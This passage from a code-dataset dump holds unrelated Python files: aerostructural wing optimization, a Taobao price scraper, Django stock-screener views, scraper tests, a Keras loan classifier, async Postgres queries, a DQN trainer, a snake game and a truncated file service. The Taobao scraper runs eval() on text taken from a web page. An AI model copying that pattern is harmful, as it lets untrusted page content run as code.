W_wo_fuel_wbox, # [kg] MTOW\n }\n\n\n # Instantiate problem and add default surface\n OAS_prob = OASProblem(prob_dict)\n\n # Initialize the 3-D mesh object. Chordwise, spanwise, then the 3D coordinates.\n mesh = np.zeros((nx, ny, 3))\n\n # Start away from the symm plane and approach the plane as the array indices increase.\n mesh[:, :, 1] = np.linspace(-span/2, 0, ny)\n mesh[0, :, 0] = 0.34 * root_chord * np.linspace(1.0, 0., ny)\n mesh[nx-1, :, 0] = root_chord * (np.linspace(0.4, 1.0, ny)\n + 0.34 * np.linspace(1.0, 0., ny))\n for i in range(1, nx-1):\n mesh[i, :, 0] = ( mesh[nx-1, :, 0] - mesh[0, :, 0] ) / (nx-1) * i + mesh[0, :, 0]\n\n surf_dict = {'num_y' : ny,\n 'num_x' : 3,\n 'name' : 'wing',\n 'exact_failure_constraint' : False,\n 'mesh' : mesh,\n\n # Airfoil properties for viscous drag calculation\n 'k_lam' : 0.05, # percentage of chord with laminar\n # flow, used for viscous drag\n 't_over_c' : t_ov_c, # thickness over chord ratio\n 'c_max_t' : .303, # chordwise location of maximum (NACA0012)\n # thickness\n 'CL0' : 0., # rest of aircraft CL\n 'CD0' : rest_CD, # rest of aircraft CD\n\n 'symmetry' : True,\n 'num_twist_cp' : 5,\n 'num_thickness_cp' : 5,\n 'twist_cp' : np.array([0., 0., 0., 0., 0.]),\n 'thickness_cp' : thk_factor * 2. * np.array([0.01, 0.01, 0.01, 0.01, 0.01]),\n # Material properties taken from http://www.performance-composites.com/carbonfibre/mechanicalproperties_2.asp\n # 'E' : 45.e9,\n # 'G' : 15.e9,\n # 'yield' : 350.e6 / 2.0,\n # 'mrho' : 1.6e3,\n 'E' : 70.e9 * stiffness_factor, # [Pa] Young's modulus of the spar\n 'G' : 30.e9 * stiffness_factor, # [Pa] shear modulus of the spar\n 'yield' : 500.e6/ 2.5 / 1.5, # [Pa] yield stress divided by 2.5 for limiting case\n 'mrho' : 2.8e3, # [kg/m^3] material density\n 'fem_origin' : 0.4,\n 'exact_failure_constraint' : False, # if false, use KS function\n 'monotonic_con' : None,\n 'sweep' : 1. * sweep_deg\n }\n\n # Add the specified wing surface to the problem\n OAS_prob.add_surface(surf_dict)\n\n # Add design variables, constraint, and objective on the problem\n # OAS_prob.add_desvar('alpha', lower=-10., upper=10.)\n OAS_prob.add_constraint('L_equals_W', equals=0.)\n OAS_prob.add_objective('fuelburn', scaler=1e-5)\n\n\n # Setup problem and add design variables, constraint, and objective\n OAS_prob.add_desvar('wing.twist_cp', lower=-10., upper=10.)\n OAS_prob.add_desvar('wing.thickness_cp', lower=0.002, upper=0.2, scaler=1e2)\n OAS_prob.add_constraint('wing_perf.failure', upper=0.)\n OAS_prob.add_constraint('wing_perf.thickness_intersects', upper=0.)\n OAS_prob.setup()\n\n st = time()\n # Actually run the problem\n OAS_prob.run()\n\n print(\"\\nFuelburn:\", OAS_prob.prob['fuelburn'])\n print(\"Time elapsed: {} secs\".format(time() - st))\n print(OAS_prob.prob['wing.thickness_cp'])\n # print(OAS_prob.prob['wing_perf.disp'])\n print(OAS_prob.prob['wing_perf.structural_weight'])\n ","repo_name":"shamsheersc19/OpenAeroStruct","sub_path":"run_aerostruct_Q.py","file_name":"run_aerostruct_Q.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"31475688411","text":"import requests\nimport re\n\ndef getHtmlText(url):\n\ttry:\n\t\trusult = requests.get(url,timeout=30)\n\t\trusult.raise_for_status()\n\t\trusult.encoding = rusult.apparent_encoding\n\t\treturn rusult.text\n\texcept Exception as e:\n\t\treturn e\n\t\n\n\ndef parserText(infoList,html):\n\ttry:\n\t\tpList = re.findall(r'\\\"view_price\\\"\\:\\\"[\\d\\.]*\\\"',html)\n\t\ttList = re.findall(r'\\\"raw_title\\\"\\:\\\".*?\\\"',html)\n\t\t# print(len(pList))\n\t\tfor i in range(len(pList)):\n\t\t\tprice = eval(pList[i].split(':')[1])\n\t\t\ttitle = eval(tList[i].split(':')[1])\n\t\t\t# print(title)\n\t\t\tinfoList.append([price,title])\n\texcept Exception as e:\n\t\tprint(\"parserError\",e)\n\ndef printInfo(infoList):\n\ttplt = '{:4}\\t{:8}\\t{:32}'\n\tprint(tplt.format('序号','价格','标题'))\n\t# print(infoList)\n\tcount = 0\n\tfor g in infoList:\n\t\tcount += 1\n\t\tprint(tplt.format(count,g[0],g[1]))\n\ndef main():\n\tgoods = '书包'\n\tpage = 3\n\tstart_url = 'https://s.taobao.com/search?q=' + goods\n\tinfoList = []\n\tfor i in range(page):\n\t\ttry:\n\t\t\turl = start_url + '&s=' + str(44*i)\n\t\t\thtml = getHtmlText(url)\n\t\t\t# print(html)\n\t\t\tparserText(infoList,html)\n\t\texcept:\n\t\t\tcontinue\n\tprintInfo(infoList)\nmain()\n\n\t","repo_name":"liuhe37186/studypython","sub_path":"taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73719544466","text":"from django.shortcuts import render, redirect, HttpResponse, HttpResponseRedirect\nimport plotly.io as pi\nimport datetime as dt\nfrom decimal import Decimal\nfrom datetime import timezone\nfrom screener.models import *\nfrom .helpers.db_manager import *\nfrom .helpers.plotter import *\nfrom .helpers.index_calculator import *\n\n# Create your views here.\ndef index(request):\n print(request)\n context={\n\n }\n return render(request, 'screener/landing.html', context)\n\n\ndef company(request):\n try:\n ticker = request.GET['search_query'].upper()\n #start_date = dt.datetime.strptime(request.GET['start_date'], '%Y-%m-%d').replace(tzinfo=timezone.utc).date()\n\n #start_date = request.GET['start_date']\n #end_date = request.GET['end_date']\n\n company = Company.objects.filter(ticker = ticker)\n\n if not company:\n #create company objects\n create_object(ticker)\n \n\n ## HANDLE ERRORS\n except Exception as e:\n context = { \n 'req': request.GET['search_query'],\n 'error': f\"{type(e).__name__} at line {e.__traceback__.tb_lineno} of {__file__}: {e}\",\n }\n return render(request, 'screener/404.html', context)\n\n \n # query db and create context\n company = Company.objects.filter(ticker = ticker)[0]\n\n # CALCULATE INDICES\n # get income_statement and balancesheet\n income_statement = pd.read_csv(ARCHIVE_PATH + \"income_statement/\" + str(company.income_statement), index_col=0)\n balancesheet = pd.read_csv(ARCHIVE_PATH + \"balancesheet/\" + str(company.balancesheet), index_col=0)\n cash_flow = pd.read_csv(ARCHIVE_PATH + \"cash_flow/\" + str(company.cash_flow), index_col=0)\n \n indices = calculate_indices(financials = income_statement, balancesheet = balancesheet)\n mean_indices = industry_mean(company.industry)\n\n # CREATE PLOTS\n # get history\n end_date = dt.datetime.today().date()\n history = pd.read_csv(ARCHIVE_PATH + \"history/\" + str(company.history), index_col='date')\n #convert dates to str\n start_date = dt.datetime.strftime(end_date-pd.DateOffset(years= 10), '%Y-%m-%d')\n end_date = dt.datetime.strftime(end_date, '%Y-%m-%d')\n\n candle_plot = pi.to_html( \n plot_candlestick(history.loc[start_date: end_date]), \n full_html=False, \n default_height=\"800px\"\n )\n\n asset_liabilities = pi.to_html(\n plot_balancesheet(balancesheet), \n full_html=False, \n #default_height=\"800px\"\n )\n\n revenue_income = pi.to_html(\n plot_income_statement(income_statement), \n full_html=False, \n #default_height=\"800px\"\n )\n\n context={\n\n 'ticker':company.ticker,\n 'name':company.name,\n 'sector':company.sector,\n 'industry':company.industry,\n 'phone':company.phone,\n 'website':company.website,\n 'country':company.country,\n 'state':company.state,\n 'city':company.city,\n 'address':company.address,\n 'summary':company.summary,\n 'employees':company.employees,\n\n 'latest_update':company.latest_update,\n\n 'balancesheet':balancesheet.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n 'income_statement':income_statement.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n 'cash_flow':cash_flow.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n\n 'history':history,\n \n\n 'indices':indices,\n 'mean_indices':mean_indices,\n\n #plots \n 'candlestick': candle_plot,\n 'asset_liabilities': asset_liabilities,\n 'revenue_income': revenue_income,\n \n }\n\n return render(request, 'screener/company.html', context)\n\n\ndef update(request):\n \n ticker = request.GET['search_query'].upper()\n update_object(ticker)\n return HttpResponseRedirect('/company/?search_query=' + ticker)\n\n\n\ndef add_stock_to_portfolio(request):\n portfolio = Portfolio.objects.all()\n if request.method == 'POST':\n # Ottieni i dettagli dal form\n company_id = request.POST['company']\n quantity = int(request.POST['quantity'])\n purchase_price = Decimal(request.POST['purchase_price'])\n purchase_commission = Decimal(request.POST['purchase_commission'])\n purchase_date = datetime.strptime(request.POST['purchase_date'], '%Y-%m-%d')\n\n # Trova l'azienda dal suo ID\n company = Company.objects.get(pk=company_id)\n\n # Aggiungi la nuova azione al portafoglio\n portfolio.add_stock(company, quantity, purchase_price, purchase_commission, purchase_date)\n\n # Redirect alla pagina del portafoglio\n return redirect('screener:portfolio_dashboard') # Assumi che l'URL sia definito come 'portfolio:portfolio_details'\n \n # Se il metodo non è POST o se ci sono errori nel form, visualizza il template di aggiunta stock\n companies = Company.objects.all()\n context = {\n 'companies': companies,\n 'portfolio': portfolio,\n }\n return render(request, 'screener/portfolio.html', context)\n","repo_name":"leoBitto/NFA_screener","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17728693722","text":"import unittest\nimport pandas as pd\nimport boxscores\nfrom bs4 import BeautifulSoup\n\n\nclass TestScrapeForBoxscore(unittest.TestCase):\n\n def test_scrape_boxscore_links(self):\n html = 'Box Score'\n\n links = boxscores.scrape_for_boxscore_links(html_string=html)\n\n self.assertEqual(links, ['foo'])\n\n def test_scrape_for_boxscore(self):\n html = '''\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
Basic Box Score
foo
bar
\n \n \n \n \n \n \n \n \n
Basic Box Score
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
Basic Box Score
foo
BAR
\n '''\n\n mock_id = 'XY5430'\n\n df = boxscores.scrape_for_boxscore(BeautifulSoup(html, 'html.parser'),\n mock_id)\n\n expected = pd.DataFrame(\n data={'foo': ['bar', 'BAR'], 'TEAM': ['GSW', 'BRK'],\n 'GAME_ID': [mock_id, mock_id]}, index=[0, 1])\n\n self.assertIsInstance(df, pd.DataFrame)\n pd.testing.assert_frame_equal(df, expected)\n\n def test_format_dataframe(self):\n mock_data = {\n 'Starters': ['a', 'b', 'c', 'd', 'e', 'Reserves', 'g', 'h',\n 'Team Totals', 'a', 'b', 'c', 'd', 'e', 'Reserves',\n 'g', 'h', 'i', 'Team Totals'],\n 'MP': ['11:00', '1:00', '1:00', '1:00', '1:00', 'foobar', '1:00',\n 'Did Not Play', '44:00', '11:00', '1:00', '1:00', '1:00',\n '1:00', 'foobar', '1:00', 'Did Not Play', 'Did Not Dress',\n '44:00'],\n 'FG%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n '3P%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n 'FT%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n }\n mock_df = pd.DataFrame(data=mock_data)\n\n expected_data = {\n 'NAME': ['a', 'b', 'c', 'd', 'e', 'g', 'a', 'b', 'c', 'd', 'e',\n 'g'],\n 'MP': ['11:00', '1:00', '1:00', '1:00', '1:00', '1:00', '11:00',\n '1:00', '1:00', '1:00', '1:00', '1:00']\n }\n\n expected_df = pd.DataFrame(data=expected_data)\n formatted_df = boxscores.format_dataframe(mock_df)\n\n pd.testing.assert_frame_equal(formatted_df, expected_df)\n\n def test_set_dtypes(self):\n test_cases = {\n 'NAME': {'series': ['Hello', 'World', 'foo', 'bar'],\n 'dtype': 'string'},\n 'MP': {'series': ['11:11', '12:12', '13:13', '0:23'],\n 'dtype': 'timedelta64[ns]'},\n 'FG': {'series': ['1', '2', '3', '4'], 'dtype': 'int64'}\n }\n\n mock_data = {}\n\n for key in test_cases.keys():\n mock_data[key] = test_cases[key]['series']\n\n mock_df = pd.DataFrame(data=mock_data)\n\n for index, series in mock_df.items():\n self.assertEqual('object', series.dtype)\n\n mock_df = mock_df.apply(boxscores.set_dtypes)\n\n for index, series in mock_df.items():\n self.assertEqual(test_cases[series.name]['dtype'], series.dtype)\n","repo_name":"nuggsrocks/nba-stats","sub_path":"tests/boxscores_test.py","file_name":"boxscores_test.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11378690482","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.models import load_model\nfrom sklearn.metrics import classification_report\n\n\ndef feat_info(col_name):\n print(data_info.loc[col_name]['Description'])\n\n\ndef fill_mort_acc(total_acc, mort_acc):\n if np.isnan(mort_acc):\n return total_acc_avg[total_acc]\n else:\n return mort_acc\n\n\ndata_info = pd.read_csv('lending_club_info.csv', index_col='LoanStatNew')\ndf = pd.read_csv('lending_club_loan_two.csv')\n\n# sns.countplot(x='loan_status', data=df)\n# plt.figure(figsize=(12,4))\n# sns.distplot(df['loan_amnt'], kde=False, bins=40)\n\n# print(df.corr()['loan_amnt'].sort_values(ascending=False))\n# plt.figure(figsize=(12,7))\n# sns.heatmap(df.corr(), annot=True, cmap='viridis')\n\n# feat_info('installment')\n# feat_info('loan_amnt')\n\n# sns.scatterplot(x='installment', y='loan_amnt', data=df, alpha=0.5)\n\n# sns.boxplot(x='loan_status', y='loan_amnt', data=df)\n\n# print(df.groupby('loan_status')['loan_amnt'].describe())\n# print(df['grade'].unique())\n# print(df['sub_grade'].unique())\n\n# sns.countplot(x='grade', data=df, hue='loan_status')\n# plt.figure(figsize=(12,4))\n# sns.countplot(x='sub_grade', data=df, palette='coolwarm', order=sorted(df['sub_grade'].unique()))\n\ndf['loan_repaid'] = df['loan_status'].map({'Fully Paid': 1, 'Charged Off': 0})\n# df.corr()['loan_repaid'].sort_values().drop('loan_repaid').plot(kind='bar')\n\n# print(100*(df.isnull().sum()/len(df)))\ndf = df.drop('emp_title', axis=1)\n# sns.countplot(x='emp_length', data=df, order=['< 1 year',\n# '1 year',\n# '2 years',\n# '3 years',\n# '4 years',\n# '5 years',\n# '6 years',\n# '7 years',\n# '8 years',\n# '9 years',\n# '10+ years'], hue='loan_repaid')\n# plt.show()\n# emp_fp = df[df['loan_status']=='Fully Paid'].groupby('emp_length').count()['loan_status']\n# emp_co = df[df['loan_status']=='Charged Off'].groupby('emp_length').count()['loan_status']\n# print(emp_co/emp_fp)\n\ndf = df.drop('emp_length', axis=1)\n# similar ratios between different loan statuses\ndf = df.drop('title', axis=1)\n# similar to purpose also it has null values\n# print(df['mort_acc'].value_counts())\n\n# print(corr()['mort_acc']) total_acc has highest correlation with mort_acc\ntotal_acc_avg = df.groupby('total_acc').mean()['mort_acc']\ndf['mort_acc'] = df.apply(lambda x: fill_mort_acc(x['total_acc'], x['mort_acc']), axis=1)\ndf = df.dropna()\n# drop the NaN values as they are very less in number probably around 500\n# print(df.isnull().sum())\n\n# print(df.select_dtypes(['object']).columns)\n# returns columns with string datatype\n\ndf['term'] = df['term'].apply(lambda term: int(term[:3]))\ndf = df.drop('grade', axis=1)\n\ndummies = pd.get_dummies(df['sub_grade'], drop_first=True)\ndf = pd.concat([df.drop('sub_grade', axis=1), dummies], axis=1)\n\ndummies = pd.get_dummies(df[['verification_status', 'application_type', 'initial_list_status', 'purpose']], drop_first=True)\ndf = pd.concat([df.drop(['verification_status', 'application_type', 'initial_list_status', 'purpose'], axis=1), dummies], axis=1)\n\ndf['home_ownership'] = df['home_ownership'].replace(['NONE', 'ANY'], 'OTHER')\ndummies = pd.get_dummies(df['home_ownership'], drop_first=True)\ndf = pd.concat([df.drop('home_ownership', axis=1), dummies], axis=1)\n\ndf['zip_code'] = df['address'].apply(lambda z: z[-5:])\ndummies = pd.get_dummies(df['zip_code'], drop_first=True)\ndf = pd.concat([df.drop('zip_code', axis=1), dummies], axis=1)\ndf = df.drop('address', axis=1)\n\ndf = df.drop('issue_d', axis=1)\n# case of data leakage\ndf['earliest_cr_year'] = df['earliest_cr_line'].apply(lambda d: int(d[-4:]))\ndf = df.drop('earliest_cr_line', axis=1)\ndf = df.drop('loan_status', axis=1)\n#print(df['purpose'].value_counts())\n\n# conversion of dataframe values to numpy array is important step as tensorflow only works on arrays\nX = df.drop('loan_repaid', axis=1).values\ny = df['loan_repaid'].values\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)\n\nscaler = MinMaxScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\nmodel = Sequential()\n# first layer add same number of neurons as number of rows then decrease in the later layers\nmodel.add(Dense(78, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(39, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(19, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam')\n\nmodel.fit(x=X_train, y=y_train, epochs=25, batch_size=256, validation_data=(X_test, y_test))\nmodel.save('loan.h5')\n\nlosses = pd.DataFrame(model.history.history)\n# losses.plot()\n# plt.show()\n\npredictions = model.predict_classes(X_test)\nprint(classification_report(y_test, predictions))\n","repo_name":"KRUPESHT/Tensorflow_with_Keras","sub_path":"Keras API Project.py","file_name":"Keras API Project.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35899681302","text":"import json\n\nfrom bot.models.database.postgresql.model import asyncPostgresModel\n\n\nasync def insert_keyword(user_id: int, keyword: list[dict[str, list[str]]]):\n result = None\n try:\n query = '''INSERT INTO schema.youtube(user_id, keyword) VALUES($1, $2) \n ON CONFLICT DO NOTHING'''\n json_data = json.dumps(keyword, indent=4, ensure_ascii=False)\n result = await asyncPostgresModel.executeone(query, [user_id, json_data])\n except Exception: # noqa\n await update_keyword(user_id, keyword)\n return result\n\n\nasync def update_keyword(user_id: int, keyword: list[dict[str, list[str]]]):\n query = '''UPDATE schema.youtube SET keyword = $2 WHERE user_id = $1'''\n json_data = json.dumps(keyword, indent=4)\n result = await asyncPostgresModel.executeone(query, [user_id, json_data])\n return result\n\n\nasync def fetchone_keyword(user_id: int) -> list[dict[str, list[str]]]:\n query = '''SELECT keyword FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return json.loads(result.get('keyword'))\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nasync def insert_search_option(user_id: int, option: str, target_quantity: int, parsing_delay: int):\n query = '''INSERT INTO schema.youtube(user_id, search_option, target_quantity, parsing_delay) \n VALUES($1, $2, $3, $4) ON CONFLICT DO NOTHING'''\n result = await asyncPostgresModel.executeone(query, [user_id, option, target_quantity, parsing_delay])\n if result == 'INSERT 0 0':\n await update_search_option(user_id, option, target_quantity, parsing_delay)\n return result\n\n\nasync def update_search_option(\n user_id: int,\n search_filter: str = None,\n target_quantity: int = None,\n parsing_delay: int = None\n):\n \"\"\"\n option or target_quantity or parsing_delay\n :param user_id:\n :param search_filter:\n :param target_quantity:\n :param parsing_delay:\n :return:\n \"\"\"\n result = None\n if search_filter:\n query = '''UPDATE schema.youtube SET search_option = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, search_filter])\n if target_quantity:\n query = '''UPDATE schema.youtube SET target_quantity = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, target_quantity])\n if parsing_delay:\n query = '''UPDATE schema.youtube SET parsing_delay = $2 WHERE user_id = $1'''\n result = await asyncPostgresModel.executeone(query, [user_id, parsing_delay])\n return result\n\n\nasync def fetchone_search_filter(user_id: int) -> str:\n query = '''SELECT search_option FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('search_option')\n\n\nasync def fetchone_target_quantity(user_id: int) -> int:\n query = '''SELECT target_quantity FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('target_quantity')\n\n\nasync def fetchone_parsing_delay(user_id: int) -> int:\n query = '''SELECT parsing_delay FROM schema.youtube WHERE user_id = $1'''\n result = await asyncPostgresModel.fetchone(query, [user_id])\n return result.get('parsing_delay')\n\n# ----------------------------------------------------------------------------------------------------------------------\n","repo_name":"coolworld2049/youtube_search_bot","sub_path":"bot/models/database/postgresql/youtube_api.py","file_name":"youtube_api.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27793126974","text":"def play(game, rl, iteration, human_transition=None, human_ctrl=False, screen=True):\n human_ctrl_cnt = 0\n human_a = 0\n step = 0\n if not human_transition:\n human_transition = []\n else:\n human_ctrl = False\n for t in human_transition:\n rl.store_transition(t[0], t[1], t[2], t[3])\n step += 1\n \n total_score = []\n episode = 0\n start_train = False\n while episode < iteration:\n s = game.reset()\n done = False\n descent = 1\n performance = 0\n while not done:\n if screen: game.render()\n a = rl.actor(s)\n if human_ctrl:\n if not human_ctrl_cnt:\n try:\n human_a = int(input('input action 0~{}: '.format(game.action_space.n - 1)))\n if human_a < 0 or human_a > 2:\n human_a = 1\n except ValueError:\n human_a = 1\n human_ctrl_cnt = 20\n else:\n human_ctrl_cnt -= 1\n a = human_a\n\n s_, r, done, _ = game.step(a)\n performance += r\n position, velocity = s_\n r = abs(position + .52) / 1.12 + abs(velocity) / .07 - 1\n if done: r = 10\n rl.store_transition(s, a, r, s_)\n if step >= mem_size:\n if not start_train:\n human_ctrl = False\n start_train = True\n break\n rl.learn()\n else:\n human_transition.append((s, a, r, s_))\n s = s_\n step += 1\n # if start_train:\n # if not step % 500: print('Timestep {} get score: {}'.format(step, sum(total_score[-500:])))\n # total_score.append(performance)\n # if step == iteration:\n # break;\n if start_train and step > mem_size:\n print('Episode {} get score: {}'.format(episode, performance))\n total_score.append(performance)\n episode += 1\n\n return total_score, human_transition\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i',\n default='100',\n dest='ITERATION',\n help='input the iteration of training')\n\n parser.add_argument('-m',\n default='10000',\n dest='MEMORYSIZE',\n help='input the size of memory')\n\n parser.add_argument('-b',\n default='32',\n dest='BATCHSIZE',\n help='input the size of batch')\n\n parser.add_argument('-lr',\n default='0.0005',\n dest='LEARNINGRATE',\n help='input learning rate')\n\n parser.add_argument('-hu',\n default='',\n dest='HUMANEXP',\n help='input human experience')\n\n parser.add_argument('-hu--out',\n default='',\n dest='HUMANEXPOUT',\n help='human experience output path')\n\n parser.add_argument('-score--out',\n default='score.pkl',\n dest='SCOREOUT',\n help='score output path')\n\n parser.add_argument('-screen',\n default='true',\n dest='SCREEN',\n help='show the screen of game (true/false)')\n\n args = parser.parse_args()\n \n import gym\n from src.rl import RL\n import matplotlib.pyplot as plt\n import numpy as np\n import sys\n import matplotlib\n import matplotlib.patches as mpatches\n matplotlib.use('Agg')\n\n try:\n iteration = int(args.ITERATION)\n mem_size = int(args.MEMORYSIZE)\n batch_size = int(args.BATCHSIZE)\n except ValueError:\n print('error: iteration or memory size must be an integer')\n sys.exit()\n\n try:\n lr = float(args.LEARNINGRATE)\n except ValueError:\n print('error: learning rate must be an number')\n sys.exit()\n\n # game = gym.make('CartPole-v0')\n game = gym.make('MountainCar-v0')\n game = game.unwrapped\n\n rl_prioritized = RL(game.observation_space.shape[0] , range(game.action_space.n), batch_size=batch_size, memory_size=mem_size, prior=True, verbose=False, lr=lr)\n rl_dqn = RL(game.observation_space.shape[0] , range(game.action_space.n), batch_size=batch_size, memory_size=mem_size, prior=False, verbose=False, lr=lr)\n\n import pickle\n\n if args.HUMANEXP == '':\n human_transition = None\n else:\n with open(args.HUMANEXP, 'rb') as f:\n human_transition = pickle.load(f)\n \n hu_ctrl = False if args.HUMANEXPOUT == '' else True\n screen = False if args.SCREEN.upper() == 'FALSE' else True\n\n print()\n print(\"Prioritized experience replay:\")\n score_a, human_transition = play(game, rl_prioritized, iteration, human_transition, human_ctrl=hu_ctrl, screen=screen)\n print()\n print(\"Uniform sampling:\")\n score_b, _ = play(game, rl_dqn, iteration, human_transition, screen=screen)\n \n if hu_ctrl:\n with open(args.HUMANEXPOUT, 'wb') as f:\n pickle.dump(human_transition, f, -1)\n\n with open(args.SCOREOUT, 'wb') as f:\n pickle.dump({'a': score_a, 'b': score_b}, f, -1)\n \n pic = rl_prioritized.draw_policy()\n\n plt.figure(figsize=(6, 6))\n plt.imshow(pic, extent=[-1.2,.6,-.7,.7])\n red_patch = mpatches.Patch(color='red', label='push left')\n green_patch = mpatches.Patch(color='green', label='no push')\n blue_patch = mpatches.Patch(color='blue', label='push right')\n plt.legend(handles=[red_patch, green_patch, blue_patch])\n plt.xlabel('position')\n plt.ylabel('velocity')\n plt.show()\n\n plt.plot(range(len(score_a)), score_a, c='r', label='DQN with prioritized replay')\n plt.plot(range(len(score_b)), score_b, c='b', label='DQN')\n\n plt.show()\n","repo_name":"yutongshen/RL-DoubleDQN-PrioritizedReplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10813838823","text":"from graphics import Canvas\nimport time\nimport random\n\nCANVAS_WIDTH = 400\nCANVAS_HEIGHT = 400\nSIZE = 20\nDELAY = 0.1\n\ndef main():\n # Set up the world\n canvas = Canvas(CANVAS_WIDTH, CANVAS_HEIGHT)\n player = canvas.create_rectangle(0, 0, SIZE, SIZE, 'blue')\n target = create_random_target(canvas)\n\n current_direction = \"right\"\n\n # Animation loop\n while True:\n # Update the world for one heartbeat\n current_direction = changedirection(canvas, current_direction)\n\n if current_direction == \"right\":\n canvas.move(player, SIZE, 0)\n elif current_direction == \"left\":\n canvas.move(player, -SIZE, 0)\n elif current_direction == \"up\":\n canvas.move(player, 0, -SIZE)\n elif current_direction == \"down\":\n canvas.move(player, 0, SIZE)\n\n # Check for out of bounds\n player_x = canvas.get_left_x(player)\n player_y = canvas.get_top_y(player)\n if player_x < 0 or player_x >= CANVAS_WIDTH or player_y < 0 or player_y >= CANVAS_HEIGHT:\n game_over(canvas)\n break\n\n # Check for collision with the goal\n if check_collision(canvas, player, target):\n canvas.delete(target)\n target = create_random_target(canvas)\n\n # Sleep\n time.sleep(DELAY)\n\ndef changedirection(canvas, current_direction):\n key = canvas.get_last_key_press()\n if key == 'ArrowLeft' and current_direction != \"right\":\n return \"left\"\n elif key == 'ArrowRight' and current_direction != \"left\":\n return \"right\"\n elif key == 'ArrowUp' and current_direction != \"down\":\n return \"up\"\n elif key == 'ArrowDown' and current_direction != \"up\":\n return \"down\"\n else:\n return current_direction\n\ndef create_random_target(canvas):\n rand_x = random.randint(0, CANVAS_WIDTH - SIZE)\n rand_y = random.randint(0, CANVAS_HEIGHT - SIZE)\n while rand_x % SIZE != 0:\n rand_x = random.randint(0, CANVAS_WIDTH - SIZE)\n while rand_y % SIZE != 0:\n rand_y = random.randint(0, CANVAS_HEIGHT - SIZE)\n return canvas.create_rectangle(rand_x, rand_y, rand_x + SIZE, rand_y + SIZE, 'orange')\n\ndef check_collision(canvas, obj1, obj2):\n obj1_leftx = canvas.get_left_x(obj1)\n obj1_topy = canvas.get_top_y(obj1)\n obj2_leftx = canvas.get_left_x(obj2)\n obj2_topy = canvas.get_top_y(obj2)\n return (obj1_leftx == obj2_leftx and obj1_topy==obj2_topy)\n\ndef game_over(canvas):\n canvas.create_text(CANVAS_WIDTH / 2, CANVAS_HEIGHT / 2, text='Game Over',color = 'red')\n\nif __name__ == '__main__':\n main()\n","repo_name":"taozhaojun/codeinplace2023","sub_path":"baby snake/babysnake.py","file_name":"babysnake.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39029211167","text":"from items.item import Item\nfrom actionable import WithActions, Action\nfrom worker import ServiceException\nimport collections\n\nFileResponse=collections.namedtuple(\"FileResponse\", [\"name\", \"length\", \"block_yielder\"])\n\n@WithActions\nclass FileItem(Item):\n\n def __init__(self):\n super(FileItem, self).__init__()\n\n @Action(\"_init\", \"system\")\n def init(self, worker):\n worker.create_initial_file_version()\n\n @Action(\"put\", \"editor\", _file_data=\"\")\n def put_file(self, worker,\n _file_data):\n return self.put_file_previous(worker, None, _file_data)\n\n @Action(\"put\", \"editor\", previous=\"\", _file_data=\"\")\n def put_file_previous(self, worker,\n previous: \"int: Previous version of the file that new version is based on.\",\n _file_data):\n file_version, file_length, file_hash = worker.write_file_data(previous, _file_data)\n self.props[\"file_version\"] = file_version\n self.props[\"file_length\"] = file_length\n self.props[\"file_hash\"] = file_hash\n self.modified=True\n return self.get_metadata(worker)\n\n @Action(\"put\", \"editor\", file_version=\"\", block_number=\"\", _file_data=\"\")\n def put_file_block(self, worker,\n file_version: \"int: Version of the file\",\n block_number: \"int: Block number\",\n _file_data):\n worker.write_block_data(file_version, 